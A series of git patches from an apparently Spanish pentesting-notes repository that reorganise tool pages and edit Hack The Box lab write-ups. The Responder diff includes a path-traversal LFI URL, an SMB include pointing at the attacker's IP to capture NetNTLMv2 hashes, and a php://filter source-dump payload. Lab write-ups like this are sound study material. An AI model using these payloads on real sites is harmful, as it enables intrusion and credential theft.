Subject: [PATCH 0133/1701] Rename Hash-Identifier.md to
Herramientas_y_Scripts/Hash-Identifier.md
---
Hash-Identifier.md => Herramientas_y_Scripts/Hash-Identifier.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Hash-Identifier.md => Herramientas_y_Scripts/Hash-Identifier.md (100%)
diff --git a/Hash-Identifier.md b/Herramientas_y_Scripts/Hash-Identifier.md
similarity index 100%
rename from Hash-Identifier.md
rename to Herramientas_y_Scripts/Hash-Identifier.md
From 46ddb59b6cbff1a529d63992dc4902a648a3c258 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:50:19 +0200
Subject: [PATCH 0134/1701] Rename HashCat.md to
Herramientas_y_Scripts/HashCat.md
---
HashCat.md => Herramientas_y_Scripts/HashCat.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename HashCat.md => Herramientas_y_Scripts/HashCat.md (100%)
diff --git a/HashCat.md b/Herramientas_y_Scripts/HashCat.md
similarity index 100%
rename from HashCat.md
rename to Herramientas_y_Scripts/HashCat.md
From 4a8b7c30561b4e1af633b42ec56c6eb861a484a0 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:50:45 +0200
Subject: [PATCH 0135/1701] Rename HashId.md to
Herramientas_y_Scripts/HashId.md
---
HashId.md => Herramientas_y_Scripts/HashId.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename HashId.md => Herramientas_y_Scripts/HashId.md (100%)
diff --git a/HashId.md b/Herramientas_y_Scripts/HashId.md
similarity index 100%
rename from HashId.md
rename to Herramientas_y_Scripts/HashId.md
From 84fe3423a7e184ba48ae0f777ec4812e49f24f85 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:51:16 +0200
Subject: [PATCH 0136/1701] Rename SQLmap.md to
Herramientas_y_Scripts/SQLmap.md
---
SQLmap.md => Herramientas_y_Scripts/SQLmap.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename SQLmap.md => Herramientas_y_Scripts/SQLmap.md (100%)
diff --git a/SQLmap.md b/Herramientas_y_Scripts/SQLmap.md
similarity index 100%
rename from SQLmap.md
rename to Herramientas_y_Scripts/SQLmap.md
From 4a6bc955c2b7bc3352e13017e72610d7f8f97c35 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:51:45 +0200
Subject: [PATCH 0137/1701] Rename john_the_ripper.md to
Herramientas_y_Scripts/john_the_ripper.md
---
john_the_ripper.md => Herramientas_y_Scripts/john_the_ripper.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename john_the_ripper.md => Herramientas_y_Scripts/john_the_ripper.md (100%)
diff --git a/john_the_ripper.md b/Herramientas_y_Scripts/john_the_ripper.md
similarity index 100%
rename from john_the_ripper.md
rename to Herramientas_y_Scripts/john_the_ripper.md
From ea907dce7d047c2cd0c4610c5e01bd2f0f24aa52 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:52:12 +0200
Subject: [PATCH 0138/1701] Rename php-reverse-shell.md to
Herramientas_y_Scripts/php-reverse-shell.md
---
.../php-reverse-shell.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename php-reverse-shell.md => Herramientas_y_Scripts/php-reverse-shell.md (100%)
diff --git a/php-reverse-shell.md b/Herramientas_y_Scripts/php-reverse-shell.md
similarity index 100%
rename from php-reverse-shell.md
rename to Herramientas_y_Scripts/php-reverse-shell.md
From 69266a5072f2a1486a266c9c8497ba13461bcddc Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:52:52 +0200
Subject: [PATCH 0139/1701] Rename Wfuzz.md to Herramientas_y_Scripts/Wfuzz.md
---
Wfuzz.md => Herramientas_y_Scripts/Wfuzz.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Wfuzz.md => Herramientas_y_Scripts/Wfuzz.md (100%)
diff --git a/Wfuzz.md b/Herramientas_y_Scripts/Wfuzz.md
similarity index 100%
rename from Wfuzz.md
rename to Herramientas_y_Scripts/Wfuzz.md
From 62a5c3ae486c7a9749a52ffc643a6ab07ed90525 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:53:17 +0200
Subject: [PATCH 0140/1701] Rename WPScan.md to
Herramientas_y_Scripts/WPScan.md
---
WPScan.md => Herramientas_y_Scripts/WPScan.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename WPScan.md => Herramientas_y_Scripts/WPScan.md (100%)
diff --git a/WPScan.md b/Herramientas_y_Scripts/WPScan.md
similarity index 100%
rename from WPScan.md
rename to Herramientas_y_Scripts/WPScan.md
From 0ca77bd24c5ed0e12a02553888029d9c2d068eb3 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:53:40 +0200
Subject: [PATCH 0141/1701] Rename WichSystem.md to
Herramientas_y_Scripts/WichSystem.md
---
WichSystem.md => Herramientas_y_Scripts/WichSystem.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename WichSystem.md => Herramientas_y_Scripts/WichSystem.md (100%)
diff --git a/WichSystem.md b/Herramientas_y_Scripts/WichSystem.md
similarity index 100%
rename from WichSystem.md
rename to Herramientas_y_Scripts/WichSystem.md
From ab65db47bf67f291ae01a2978dda59346245a1cc Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:56:07 +0200
Subject: [PATCH 0142/1701] Update index.md
---
index.md | 20 ++++++++++----------
1 file changed, 10 insertions(+), 10 deletions(-)
diff --git a/index.md b/index.md
index c20877032f0..d3d2ab9b649 100644
--- a/index.md
+++ b/index.md
@@ -22,36 +22,36 @@
## Reporte y reconocimiento:
Herramientas útiles para la fase de reconocimiento, como reportes de SO o recopilación de puertos.
-1.[WichSystem](./WichSystem.html)
-2.[ExtractPorts](./ExtractPorts.html)
+1.[WichSystem](./Herramientas_y_Scripts/WichSystem.html)
+2.[ExtractPorts](./Herramientas_y_Scripts/ExtractPorts.html)
## Shells:
Herramientas para crear shells inversas.
-[php-reverse-shell.php](./php-reverse-shell.html)
+[php-reverse-shell.php](./Herramientas_y_Scripts/php-reverse-shell.html)
## Hash:
Herramientas de reconocimiento y des encriptación de hash.
-1.[John the Ripper](./john_the_ripper.html)
-2.[HashID](./HashId.html)
-3.[Hash Identifier](./Hash-Identifier.html)
-4.[HashCat](./HashCat.html)
+1.[John the Ripper](./Herramientas_y_Scripts/john_the_ripper.html)
+2.[HashID](./Herramientas_y_Scripts/HashId.html)
+3.[Hash Identifier](./Herramientas_y_Scripts/Hash-Identifier.html)
+4.[HashCat](./Herramientas_y_Scripts/HashCat.html)
## Fuzzing:
Fuzzing es una técnica de pruebas de software, a menudo automatizado o semiautomatizado, que implica proporcionar datos inválidos, inesperados o
aleatorios a las entradas de un programa de ordenador. Entonces se monitorizan las excepciones tales como caídas, aserciones de código erróneas, o
para encontrar potenciales filtraciones de memoria.
-[Wfuzz](./Wfuzz.html)
+[Wfuzz](./Herramientas_y_Scripts/Wfuzz.html)
## WordPress:
Escaneo de vulnerabilidades en páginas WordPress.
-[WPScan](./WPScan.html)
+[WPScan](./Herramientas_y_Scripts/WPScan.html)
## SQL:
-[SQLmap](./SQLmap.html)
+[SQLmap](./Herramientas_y_Scripts/SQLmap.html)
From 523017d2208b92492a45b300fb42c05a078a7977 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:57:25 +0200
Subject: [PATCH 0143/1701] Rename Aria2 to Linux/Programas_para_Linux/Aria2
---
Aria2 => Linux/Programas_para_Linux/Aria2 | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Aria2 => Linux/Programas_para_Linux/Aria2 (100%)
diff --git a/Aria2 b/Linux/Programas_para_Linux/Aria2
similarity index 100%
rename from Aria2
rename to Linux/Programas_para_Linux/Aria2
From 198ea691cc205a58def7156be082b0a96c07d0f4 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 16:58:47 +0200
Subject: [PATCH 0144/1701] =?UTF-8?q?Create=20Introducci=C3=B3n=5Fa=5FLinu?=
=?UTF-8?q?x.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md" | 1 +
1 file changed, 1 insertion(+)
create mode 100644 "Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md"
diff --git "a/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md" "b/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md"
new file mode 100644
index 00000000000..8b137891791
--- /dev/null
+++ "b/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md"
@@ -0,0 +1 @@
+
From f2429904b590a3f892271a46ae6b308fa1063447 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:07:00 +0200
Subject: [PATCH 0145/1701] Update HTB-Oopsie.md
---
Starting Point/HTB-Oopsie.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/Starting Point/HTB-Oopsie.md b/Starting Point/HTB-Oopsie.md
index d36388f355f..789e3b6f270 100644
--- a/Starting Point/HTB-Oopsie.md
+++ b/Starting Point/HTB-Oopsie.md
@@ -27,7 +27,7 @@ En primer lugar, vamos a comprobar si tenemos conexión
nuestro directorio mediante la herramienta 'extractPorts'.
Puedes encontrar la descripción y la herramienta extractPorts
- creada por S4vitar en mi repositorio: [ExtractPorts](https://f1r0x.github.io/ExtractPorts.html)
+ creada por S4vitar en mi repositorio: [ExtractPorts](https://f1r0x.github.io/Herramientas_y_Scripts/ExtractPorts.html)
Es este caso podemos observar los siguientes puertos
abiertos por el protocolo TCP:
@@ -224,7 +224,7 @@ configurar con nuestros datos nuestra reverse-shell. Es importante copiar el arc
ya que será difícil buscar nuestro archivo desde la página de Uploads a la hora de subirlo.
En caso de no tener el archivo php-reverse-shelll.php en vuestro sistema, lo podéis encontrar en mi repositorio
-de GitHub mediante el siguiente enlace: https://github.com/F1r0x/php-reverse-shell.php/blob/main/php-reverse-shell.php
+de GitHub mediante el siguiente enlace: [https://github.com/F1r0x/php-reverse-shell.php/blob/main/php-reverse-shell.php](./https://github.com/F1r0x/php-reverse-shell.php/blob/main/php-reverse-shell.php)
Para tenerlo, simplemente lo copiáis, abrís una terminal y crearemos el archivo mediante nano:
@@ -325,7 +325,7 @@ Para instalarlo simplemente ejecutamos:
Para descargar o copiar:
- https://gist.github.com/sl4v/c087e36164e74233514b
+ [https://gist.github.com/sl4v/c087e36164e74233514b](./https://gist.github.com/sl4v/c087e36164e74233514b)
En ese enlace encontraréis la biblioteca que vamos a utilizar, yo recomiendo instalarlo en el siguiente
directorio, si el directorio no existe crearlo.:
From bd562dfba25375ef19b25c706b593a4eb38d0015 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:22:58 +0200
Subject: [PATCH 0146/1701] Update HTB-Responder.md
---
Starting Point/HTB-Responder.md | 191 +++++++++++++-------------------
1 file changed, 80 insertions(+), 111 deletions(-)
diff --git a/Starting Point/HTB-Responder.md b/Starting Point/HTB-Responder.md
index 4233a355bb6..da7ae2a31f5 100644
--- a/Starting Point/HTB-Responder.md
+++ b/Starting Point/HTB-Responder.md
@@ -4,23 +4,18 @@
# HTB-RESPONDER
Resolución de la starting_point de HTB Responder.
-En primer lugar debemos asegurar que estamos conectados
-a la víctima y tratar de recopilar la máxima información
-posible.
+En primer lugar debemos asegurar que estamos conectados a la víctima y tratar de recopilar la máxima información posible.
-# PING
+## PING
- Para verificar la conexión y tener una primera toma de
- contacto utilizaremos el comando 'ping'.
+Para verificar la conexión y tener una primera toma de contacto utilizaremos el comando `ping`.
- ping [Ip Víctima]
+ ping [Ip Víctima]
- Mediante este comando podemos obterner la siguiente
- información:
+Mediante este comando podemos obterner la siguiente información:
- Verificar la conexión.
- - La latencia. Podemos observar el tiempo de recorrido
- de un paquete.
+ - La latencia. Podemos observar el tiempo de recorrido de un paquete.
- Podemos optener la Ip de un dominio.
- Determinar si estamos frente a un SO Linux o Windows:
Windows ttl = 128
@@ -28,44 +23,36 @@ posible.

-Como podemos ver tenemos conexión ya que nos devuelve los
-paquetes enviados y tambien podemos determinar que estamos
-frente a una máquina Windows, ya que nos muestra un ttl=127.
+Como podemos ver tenemos conexión ya que nos devuelve los paquetes enviados y tambien podemos determinar que estamos frente a una máquina Windows, ya
+que nos muestra un ttl=127.
-# NMAP
+## NMAP
-Tras conocer la máquina a la que nos enfrentamos
-pasaremos analizar los protocolos tcp/udp.
+Tras conocer la máquina a la que nos enfrentamos pasaremos analizar los protocolos tcp/udp.
-Primero analizaremos lo puertos tcp ya que son los más
-utilizados y los más rápidos de escanear.
+Primero analizaremos lo puertos tcp ya que son los más utilizados y los más rápidos de escanear.
-Mediante nmap realizaremos varios escaneos, el primero
-será un analisis de todos los puertos abiertos del
-protocolo tcp.
+Mediante nmap realizaremos varios escaneos, el primero será un analisis de todos los puertos abiertos del protocolo tcp.

- nmap -p- --open -T5 -v -n [Ip Víctima] -oG allPorts
+ nmap -p- --open -T5 -v -n [Ip Víctima] -oG allPorts
- -p- : Escanea todo el rango de puertos.
+ -p- : Escanea todo el rango de puertos.
- --open : Solo nos mostrará puertos con el estatus abierto.
+ --open : Solo nos mostrará puertos con el estatus abierto.
- -T5 : Controla el tiempo y el rendimiento del escaneo donde 1 es el más
- lento y 5 el más rápido.
+ -T5 : Controla el tiempo y el rendimiento del escaneo donde 1 es el más lento y 5 el más rápido.
- -v : Verbose. Recopila los puertos abiertos por TCP y los reporta por
- consola.
+ -v : Verbose. Recopila los puertos abiertos por TCP y los reporta por consola.
- -n : Anula la resolución DNS.
+ -n : Anula la resolución DNS.
- -oG : Nos exporta los resultados en formato grepeable.
+ -oG : Nos exporta los resultados en formato grepeable.
allPorts : Es el archivo donde se guardan los resultados.
- Gracias a la función 'extractPorts' podremos acceder en cualquier momento
- a los resultados guardados en el archivo 'allPorts' y poder copiar y pegar
+ Gracias a la función `extractPorts` podremos acceder en cualquier momento a los resultados guardados en el archivo `allPorts` y poder copiar y pegar
de forma ráìda sin tener que volver a realizar el escaneo.
Podreís encontrar la función 'extractPorts' en mi repositorio.
@@ -74,10 +61,8 @@ protocolo tcp.

-Podemos ver como nos muestra tres puertos abiertos. Tras conocer los puertos
-TCP abiertos, realizaremos un segundo escaneo enfocado solo en los puertos
-abiertos para verla información que nos reportan y exportarlo en formato
-nmap al archivo 'targed'.
+Podemos ver como nos muestra tres puertos abiertos. Tras conocer los puertos TCP abiertos, realizaremos un segundo escaneo enfocado solo en los puertos
+abiertos para verla información que nos reportan y exportarlo en formato nmap al archivo `targed`.

@@ -97,10 +82,9 @@ Ya tenemos un poco más de información, podemos ver como el puerto 80 tiene un
Vamos a tratar de comprobar en el navegador si podemos acceder algún dominio mediante la ip
de la máquina.
-Para ello nos dirigiremos al navegador (en mi caso firefox) y al tratarse de un sevicio http
-introduciremos la siguiente url:
+Para ello nos dirigiremos al navegador (en mi caso firefox) y al tratarse de un sevicio http introduciremos la siguiente url:
- http://[Ip Víctima]
+ http://[Ip Víctima]

@@ -108,20 +92,17 @@ introduciremos la siguiente url:

-Como podemos ver, la dirección no nos carga, pero al fijarnos en la url vemos que nos redirige
-a una página llamada 'unika.htb'. Tener en cuenta que firefox al no poder cargar la página en
-http automáticamente cambia a https para tambien tratar de cargar. Por eso que en firefox al tratar
+Como podemos ver, la dirección no nos carga, pero al fijarnos en la url vemos que nos redirige a una página llamada 'unika.htb'. Tener en cuenta que
+firefox al no poder cargar la página en http automáticamente cambia a https para tambien tratar de cargar. Por eso que en firefox al tratar
de cargar la página finalmente nos muestra https pero la página a la que tenemos que acceder es:
- http://unika.htb
+ http://unika.htb
-Al igual que en máquinas anteriores, vamos a tratar de introducir los datos del dominio en nuestra
-carpeta de hosts para ver si podemos cargar la paǵina.
+Al igual que en máquinas anteriores, vamos a tratar de introducir los datos del dominio en nuestra carpeta de hosts para ver si podemos cargar la paǵina.
-Para ello nos dirigiremos al directorio '/etc/hosts' y introduciremos la Ip de la vítima y el host
-al que corresponde:
+Para ello nos dirigiremos al directorio '/etc/hosts' y introduciremos la Ip de la vítima y el host al que corresponde:
- sudo nano /etc/hosts
+ sudo nano /etc/hosts

@@ -133,82 +114,73 @@ Guardamos: Cntrl + o
Salimos: Cntrl + x
-Una vez terminado esto, regresamos a nuestro navegador y tratamos de recargar la página http://unika.htb.
+Una vez terminado esto, regresamos a nuestro navegador y tratamos de recargar la página `http://unika.htb`.

Genial, ya tenemos acceso a la página. Como podemos ver, se trata de una empresa de diseño y estetica web.
Ahora vamos a tratar de revisar la página para buscar algo que nos pueda servir.
-Despues de estar un rato revisando la página veo que la unica pestaña que parece hacer algo es la EN, que
-nos ofrece poder cambiar de idioma.
+Despues de estar un rato revisando la página veo que la unica pestaña que parece hacer algo es la EN, que nos ofrece poder cambiar de idioma.

-Al cambiar al frances (FR) o al alemán (DE), algo interesante es que
-la página cambia de url y nos redirige a una página html (más vulnerable).
+Al cambiar al frances (FR) o al alemán (DE), algo interesante es que la página cambia de url y nos redirige a una página html (más vulnerable).

-Los sitios web dinámicos incluyen páginas HTML sobre la marcha utilizando información de la solicitud
-HTTP para incluir parámetros GET y POST, cookies y otras variables. Es común que una página 'incluya'
-otra página en función de algunos de estos parámetros.
+Los sitios web dinámicos incluyen páginas HTML sobre la marcha utilizando información de la solicitud HTTP para incluir parámetros GET y POST, cookies
+y otras variables. Es común que una página incluya otra página en función de algunos de estos parámetros.
Para tratar de acceder al sistema, vamos a utilizar una tecnica conocida como Local Fail Intrusion LFI.
-# Local Fail Intrusion
+## Local Fail Intrusion
-Un local fail intrusion (inclusión de archivos locales) ocurre cuando un atacante puede hacer que un sitio
-web incluya un archivo que posteriormente utilizará en su beneficio.
+Un local fail intrusion (inclusión de archivos locales) ocurre cuando un atacante puede hacer que un sitio web incluya un archivo que posteriormente
+utilizará en su beneficio.
-Si la aplicación trata esta entrada como confiable y no se realizan las comprobaciones de seguridad requeridas
-en esta entrada, entonces el atacante puede explotarla usando la cadena ../ en el nombre de la página ingresada
-y eventualmente ver los archivos confidenciales en el sistema de archivos local.
+Si la aplicación trata esta entrada como confiable y no se realizan las comprobaciones de seguridad requeridas en esta entrada, entonces el atacante
+puede explotarla usando la cadena ../ en el nombre de la página ingresada y eventualmente ver los archivos confidenciales en el sistema de archivos
+local.
-La cadena ../ se usa para recorrer un directorio hacia atras, uno a la vez. Por lo tanto, se
-incluyen varias cadenas ../ en la URL para que el controlador de archivos en el servidor vuelva
-al directorio base, es decir, C:.
+La cadena `../` se usa para recorrer un directorio hacia atras, uno a la vez. Por lo tanto, se incluyen varias cadenas `../` en la URL para que el
+controlador de archivos en el servidor vuelva al directorio base, es decir, `C:`.
-Luego, cargaremos un archivo remoto en el host proporcionandole un nombre comun en windows para que
-el sistema no pueda detectarlo como malicioso.
+Luego, cargaremos un archivo remoto en el host proporcionandole un nombre comun en windows para que el sistema no pueda detectarlo como malicioso.
-Uno de los archivos más comunes a los que un probador de penetración podría intentar acceder en una
-máquina con Windows para verificar LFI es el archivo de 'hosts'.
+Uno de los archivos más comunes a los que un probador de penetración podría intentar acceder en una máquina con Windows para verificar LFI es el
+archivo de 'hosts'.
- WINDOWS/System32/drivers/etc/hosts
+ WINDOWS/System32/drivers/etc/hosts
(Este archivo ayuda en la traducción local de nombres de host a direcciones IP).
-En nuestro caso vemos que al cambiar de idioma al frances (FR) se nos muestra una 'page=' en la
-url. Aquí es donde mediante la cadena ../ retrocederemos hasta el directorio inicial y luego
-nos dirigiremos al archivo 'hosts'. Para ello introduciremos las siguientes ordenes en la url.
+En nuestro caso vemos que al cambiar de idioma al frances (FR) se nos muestra una `page=` en la url. Aquí es donde mediante la cadena `../`
+retrocederemos hasta el directorio inicial y luego nos dirigiremos al archivo `hosts`. Para ello introduciremos las siguientes ordenes en la url.
- http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
+ http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts

-Como se puede ver, el Local File Inclusion es posible ya que podemos ver el contenido del archivo 'host' en
-situado en el directorio C:/windows/system32/drivers/etc/hosts
+Como se puede ver, el Local File Inclusion es posible ya que podemos ver el contenido del archivo `host` en situado en el directorio
+`C:/windows/system32/drivers/etc/hosts`.

-Esto es posible porque en el backend se usa el método 'include()' de PHP para añadir las URL de las página web
-de otros idiomas. Y debido a que no se realiza una desinfección adecuada en este parámetro, pudimos pasar
-entradas maliciosas y ver los archivos internos del sistema.
+Esto es posible porque en el backend se usa el método 'include()' de PHP para añadir las URL de las página web de otros idiomas. Y debido a que no se
+realiza una desinfección adecuada en este parámetro, pudimos pasar entradas maliciosas y ver los archivos internos del sistema.
-# Include()
+## Include()
-El metodo 'include() en php, toma todo el texto/código/marcado que existe en el archivo especificado y lo carga
-en la memoria, haciéndolo disponible para su uso.
+El metodo `include()` en php, toma todo el texto/código/marcado que existe en el archivo especificado y lo carga en la memoria, haciéndolo disponible
+para su uso.
-Sabemos que esta página web es vulnerable a la vulnerabilidad de inclusión de archivos y se sirve
-en un máquina de ventanas. Por lo tanto, existe la posibilidad de incluir un archivo en la estación
-de trabajo de nuestro atacante.
+Sabemos que esta página web es vulnerable a la vulnerabilidad de inclusión de archivos y se sirve ben un máquina de ventanas. Por lo tanto, existe la
+posibilidad de incluir un archivo en la estación de trabajo de nuestro atacante.
-Podemos utilizar un protocolo como SMB para que Windows intente autenticarse en nuestra máquina y
-poder capturar el NetNTLMv2.
+Podemos utilizar un protocolo como SMB para que Windows intente autenticarse en nuestra máquina y poder capturar el `NetNTLMv2`.
-# NTLM
+## NTLM
NTLM es una colección de protocolos de autenticación creados por Microsoft.
@@ -226,18 +198,18 @@ El proceso de autenticación NTLM se realiza de la siguiente manera:
para cifrar la cadena de desafío. Luego, el valor se compara con el valor recibido del cliente.
Si los valores coinciden, el cliente se autentica.
- En el archivo de configuración 'php.ini' de la maquina, si 'allow_url_include' está configurado en 'Desactivado'
+ En el archivo de configuración `php.ini` de la maquina, si `allow_url_include` está configurado en `Desactivado`
de forma predeterminada indica que PHP no carga URL HTTP o FTP remotas para evitar ataques de inclusión
de archivos remotos.
- Sin embargo, incluso si allow_url_include y allow_url_fopen están configurados en 'Off', PHP no impedirá
+ Sin embargo, incluso si allow_url_include y allow_url_fopen están configurados en `Off`, PHP no impedirá
la carga de URL de SMB.
En nuestro caso, podemos hacer un mal uso de esta funcionalidad para robar el hash NTLM.
Ahora, podemos intentar cargar una URL de SMB y capturar los valores hash del objetivo mediante 'Responder'.
- # Herramienta Responder
+## Herramienta Responder
Responder es una herramienta que puede realizar muchos tipos diferentes de ataques, pero para este escenario,
configurará un servidor SMB malicioso.
@@ -250,45 +222,42 @@ El proceso de autenticación NTLM se realiza de la siguiente manera:
Si bien no podemos revertir NetNTLMv2, podemos probar muchas contraseñas comunes diferentes para ver si
alguna genera la misma respuesta de desafío y, si encontramos una, sabemos que esa es la contraseña.
- Esto a menudo se conoce como descifrado de hash, lo que haremos con un programa llamado John The Ripper.
+ Esto a menudo se conoce como descifrado de hash, lo que haremos con un programa llamado `John The Ripper`.
- Primero nos clonaremos el repositorio de la herramienta Responder del siguiente repositorio:
+ Primero nos clonaremos el repositorio de la herramienta Responder del siguiente repositorio:
- sudo git clone https://github.com/SpiderLabs/Responder
+ sudo git clone https://github.com/SpiderLabs/Responder

- Recordar que el repositorio 'Responder' se clonara el directorio en el que nos encontremos.
- Ahora podemos ver como dentro del directorio 'Responder' se han clonado los siguientes
- archivos:
+ Recordar que el repositorio `Responder` se clonara el directorio en el que nos encontremos.
+ Ahora podemos ver como dentro del directorio 'Responder' se han clonado los siguientes archivos:

Ahora vamosa a comprobar que en archivo 'Responder.conf' tenemos configurados los parametros de escucha
SQL y SMB en On. Para ver el archivo podemos utilizar el comando 'cat' y para modificarlo el comando 'nano'.
- nano Responder.conf
+ nano Responder.conf

En caso de estar en modo off lo cambiamos al on, guardamos (Cntrl + o) y salimos (Cntrl + x).
- Ya tendriamos la herramienta Responder preparada. Ahora debemos iniciar Responder con python3
- y utilizar el indicado -I para activar el modo escucha.
+ Ya tendriamos la herramienta Responder preparada. Ahora debemos iniciar Responder con python3 y utilizar el indicado `-I` para activar el modo escucha.
- sudo python3 Responder.py -I tun0
+ sudo python3 Responder.py -I tun0


- Una vez tenemos el Responder listo y en escucha, debemos configurar un parámetro dentro del servidor de la
- máquina para que incluya un recurso de nuestro servidor SMB.
+ Una vez tenemos el Responder listo y en escucha, debemos configurar un parámetro dentro del servidor de la máquina para que incluya un recurso de
+ nuestro servidor SMB.
- Este parámetro lo configuraremos mediante el navegador web. Para ello incluiremos nuestra ip (tun0) lo cual
- podemos ver mediante el comando 'ifconfig'.
+ Este parámetro lo configuraremos mediante el navegador web. Para ello incluiremos nuestra ip (tun0) lo cual podemos ver mediante el comando `ifconfig`.
- http://unika.htb/?page=//[Ip de nuestra tun0]/somefile
+ http://unika.htb/?page=//[Ip de nuestra tun0]/somefile

@@ -298,15 +267,15 @@ He revisado varias veces la configuración y por algún motivo Responder no me f
# File Local Inlcusion PHP
Así que tras ver que con Responder no podía, empece a buscar vulnerabilidades comunes de File Local Intrusion
-y tras mucho investigar encontre una intrusión conocida como wrapper php//filter.
+y tras mucho investigar encontre una intrusión conocida como wrapper `php//filter`.
Donde básicamente mediante el buscador, incluimos una dirección que nos reporta el hash en base64.
Tras probar las distintas obciones, está fue la que me funciono a mi:
- page=php://filter/convert.base64-encode/resource=index.php
+ page=php://filter/convert.base64-encode/resource=index.php
Aqui podeís encontrar más información y más vulnerabilidades de Local File Intrusion PHP:
-https://book.hacktricks.xyz/pentesting-web/file-inclusion
+[https://book.hacktricks.xyz/pentesting-web/file-inclusion](https://book.hacktricks.xyz/pentesting-web/file-inclusion)

@@ -314,7 +283,7 @@ Lo introduciomos en el buscador:

- http://unika.htb/index.php?page=php://filter/convert.base64-encode/resource=index.php
+ http://unika.htb/index.php?page=php://filter/convert.base64-encode/resource=index.php
Y al recargar la página podemos ver como se nos reporta un hash en base64.
From a0951eb808ea98eb12bbba93ac6da865c04d125d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 17:27:44 +0200
Subject: [PATCH 0147/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 10 +++++-----
1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index 433a94505f6..48f90f50fa7 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -153,7 +153,7 @@ podemos ver como nos reporta que dentro del .zip contiene dos archivos (index.ph
Como desconocemos la contraseña, vamos a utilizar la herramienta John the Ripper para tratar de descifrarla. En
caso de no tener la herramienta instalada o queráis leer más sobre ella podréis encontrarlo en el siguiente enlace:
-[John the Ripper](./john_the_ripper.html)
+[John the Ripper](./Herramientas_y_Scripts/john_the_ripper.html)
### John the Ripper:
@@ -247,7 +247,7 @@ Tenemos un hash, pero aún no sabemos en qué tipo de algoritmo está basado. Pa
Hashid, la cual nos reportará el tipo de algoritmo más probable que se utilizó en su día para crear ese hash a
partir de una contraseña.
-Podéis encontrar más información aquí: [HashID](./HashId.html)
+Podéis encontrar más información aquí: [HashID](./Herramientas_y_Scripts/HashId.html)
Para instalar la herramienta:
@@ -269,7 +269,7 @@ voy a mostraros otra herramienta que sirve para lo mismo, pero es un poco más p
Está herramienta hace básicamente lo mismo que HashId, nos reporta el algoritmo del hash deseado, con la diferencia
de que Hash-Identifier es algo más precisa a la hora de reportar los resusltados.
-Podéis encontrar más información aquí: [Hash Identifier](./Hash-Identifier.html)
+Podéis encontrar más información aquí: [Hash Identifier](./Herramientas_y_Scripts/Hash-Identifier.html)
Para instalar:
@@ -300,7 +300,7 @@ Para ello, vamos a ver dos formas de crakear un hash, en primer lugar utilizarem
### HashCat:
-[HashCat](./HashCAt.html) es un descifrador de contraseña popular y eficaz. Mediante esta herramienta trataremos de descifrar el hash, en primer
+[HashCat](./Herramientas_y_Scripts/HashCAt.html) es un descifrador de contraseña popular y eficaz. Mediante esta herramienta trataremos de descifrar el hash, en primer
lugar, crearemos un arhivo llamado `hash2` donde guardamos el hash a descifrar.
Para crear el archivo:
@@ -313,7 +313,7 @@ En caso de no tener instalado HashCat:
Ahora debemos asegurarnos que tenemos el diccionario `rockyou.txt` en el direcctorio `/usr/share/wordlists/`.
Podemos descargarnos o copiar el diccionario `rockyou.txt` en el siguiente enlace:
-https://www.kaggle.com/datasets/wjburns/common-password-list-rockyoutxt
+[https://www.kaggle.com/datasets/wjburns/common-password-list-rockyoutxt](https://www.kaggle.com/datasets/wjburns/common-password-list-rockyoutxt)
Bien, ya lo tenemos todo preparado para ejecutar HashCat, para ello, ejecutamos el siguiente comando:
